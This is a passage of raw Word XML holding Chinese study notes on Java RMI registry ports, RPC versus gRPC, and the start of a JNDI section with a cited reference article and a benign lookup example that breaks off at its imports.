        <w:t>Naming.rebind("//localhost/CalculatorService", calculator)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，将会使用默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>表端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1099</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792277CF" w14:textId="77777777" w:rsidR="00263785" w:rsidRDefault="00263785" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5B4858" w14:textId="77777777" w:rsidR="00263785" w:rsidRDefault="00263785" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样地，在客户端使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Naming.lookup("//localhost/CalculatorService")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端会尝试连接到默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1099</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以查找指定名称的远程对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF33374" w14:textId="77777777" w:rsidR="00263785" w:rsidRDefault="00263785" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F09E107" w14:textId="77777777" w:rsidR="00263785" w:rsidRDefault="00263785" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当您没有显式指定端口时，默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1099</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将被使用。如果您希望使用不同的端口，可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中指定端口号，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"//localhost:1234/CalculatorService"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是您希望使用的自定义端口号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A94FE" w14:textId="77777777" w:rsidR="00263785" w:rsidRDefault="00263785" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634753FF" w14:textId="2602D11B" w:rsidR="00284AA2" w:rsidRDefault="00263785" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，在实际生产环境中，您可能需要更多的配置和安全性措施，例如使用不同的端口、启用防火墙规则、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密等来保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信的安全性。上述示例代码主要用于演示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基本用法，并未包含这些高级配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF3637" w14:textId="77777777" w:rsidR="00284AA2" w:rsidRDefault="00284AA2" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33CE32AE" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D44F0A" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373BEE52" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BBE385C" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293D58C7" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2153A880" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADA9FD6" w14:textId="77777777" w:rsidR="000B4FF4" w:rsidRDefault="000B4FF4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1672ED43" w14:textId="3DCD9C17" w:rsidR="00BC5945" w:rsidRDefault="00BC5945" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0007423B">
        <w:t xml:space="preserve">Remote Procedure Call </w:t>
      </w:r>
      <w:r w:rsidR="0007423B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程过程调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10709886" w14:textId="72A504FF" w:rsidR="0007423B" w:rsidRDefault="00352161" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00352161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00352161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00352161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Remote Procedure Call</w:t>
      </w:r>
      <w:r w:rsidRPr="00352161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00352161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gRPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00352161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00352161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google Remote Procedure Call</w:t>
      </w:r>
      <w:r w:rsidRPr="00352161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是两种不同的远程过程调用协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF81A4E" w14:textId="77777777" w:rsidR="001465B2" w:rsidRDefault="001465B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571339C3" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Remote Procedure Call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179BD013" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一种通信协议，用于实现分布式系统中不同节点之间的远程过程调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A2166" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许一个程序在一台计算机上调用另一台计算机上的过程（或方法），就像调用本地过程一样，使得分布式系统的开发更加简单和透明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01301E40" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了一种抽象层，使得开发人员可以将网络通信细节隐藏起来，只需要关注方法调用和参数传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0528B6" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F78F16" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    gRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google Remote Procedure Call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238EA1D" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        gRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发的一种高性能、开源的远程过程调用框架，基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>概念。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A35AF" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        gRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Protocol Buffers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protobuf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）作为接口定义语言（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），用于定义服务接口和消息格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A664A" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        gRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持多种编程语言，并提供了强大的代码生成工具，用于生成客户端和服务器端的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E2C94D" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        gRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP/2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为底层传输协议，支持双向流、流控制、多路复用等特性，具有高性能和低延迟的优势。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72514D16" w14:textId="77777777" w:rsidR="00416027" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE0F372" w14:textId="34073516" w:rsidR="001465B2" w:rsidRDefault="00416027" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看作是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一种实现方式，它借鉴了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的思想，并在性能、可扩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>展性和开发体验方面进行了优化和改进。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用了更现代的通信协议（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP/2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Protocol Buffers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），使得远程过程调用更加高效、灵活和易于使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A374726" w14:textId="77777777" w:rsidR="001465B2" w:rsidRDefault="001465B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52132A0F" w14:textId="77777777" w:rsidR="001465B2" w:rsidRDefault="001465B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1910464D" w14:textId="77777777" w:rsidR="001465B2" w:rsidRDefault="001465B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C81CED" w14:textId="77777777" w:rsidR="001465B2" w:rsidRDefault="001465B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25AA0541" w14:textId="77777777" w:rsidR="001465B2" w:rsidRDefault="001465B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D58F11F" w14:textId="615D795B" w:rsidR="00BC5945" w:rsidRDefault="0072439D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0072439D">
        <w:t>Java Naming and Directory Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E365EE4" w14:textId="60CDEF17" w:rsidR="007071BA" w:rsidRDefault="00946BC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考文章：</w:t>
      </w:r>
      <w:r w:rsidR="00EF5046">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="00F4350E" w:rsidRPr="00F4350E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JNDI</w:t>
      </w:r>
      <w:r w:rsidR="00F4350E" w:rsidRPr="00F4350E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00F4350E" w:rsidRPr="00F4350E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI</w:t>
      </w:r>
      <w:r w:rsidR="00F4350E" w:rsidRPr="00F4350E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00F4350E" w:rsidRPr="00F4350E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r w:rsidR="00F4350E" w:rsidRPr="00F4350E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一二事</w:t>
      </w:r>
      <w:r w:rsidR="00EF5046">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00946BC7">
        <w:t>https://www.freebuf.com/articles/web/321801.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BEEEF" w14:textId="77777777" w:rsidR="007071BA" w:rsidRDefault="007071BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD8F2BA" w14:textId="77777777" w:rsidR="007071BA" w:rsidRPr="007071BA" w:rsidRDefault="007071BA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50EF5C1B" w14:textId="5BBE9C1A" w:rsidR="00834C79" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1929"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1336175E" w14:textId="0DB53253" w:rsidR="00684CE2" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229560B0" w14:textId="77777777" w:rsidR="00684CE2" w:rsidRDefault="00684CE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C2E89E" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.Context;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62C101" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.InitialContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36930168" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import javax.naming.NamingException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A9B58B" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A66944" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class JNDILookupExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10213265" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6496F440" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2537DC" w14:textId="77777777" w:rsidR="00F13FDB" w:rsidRDefault="00F13FDB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
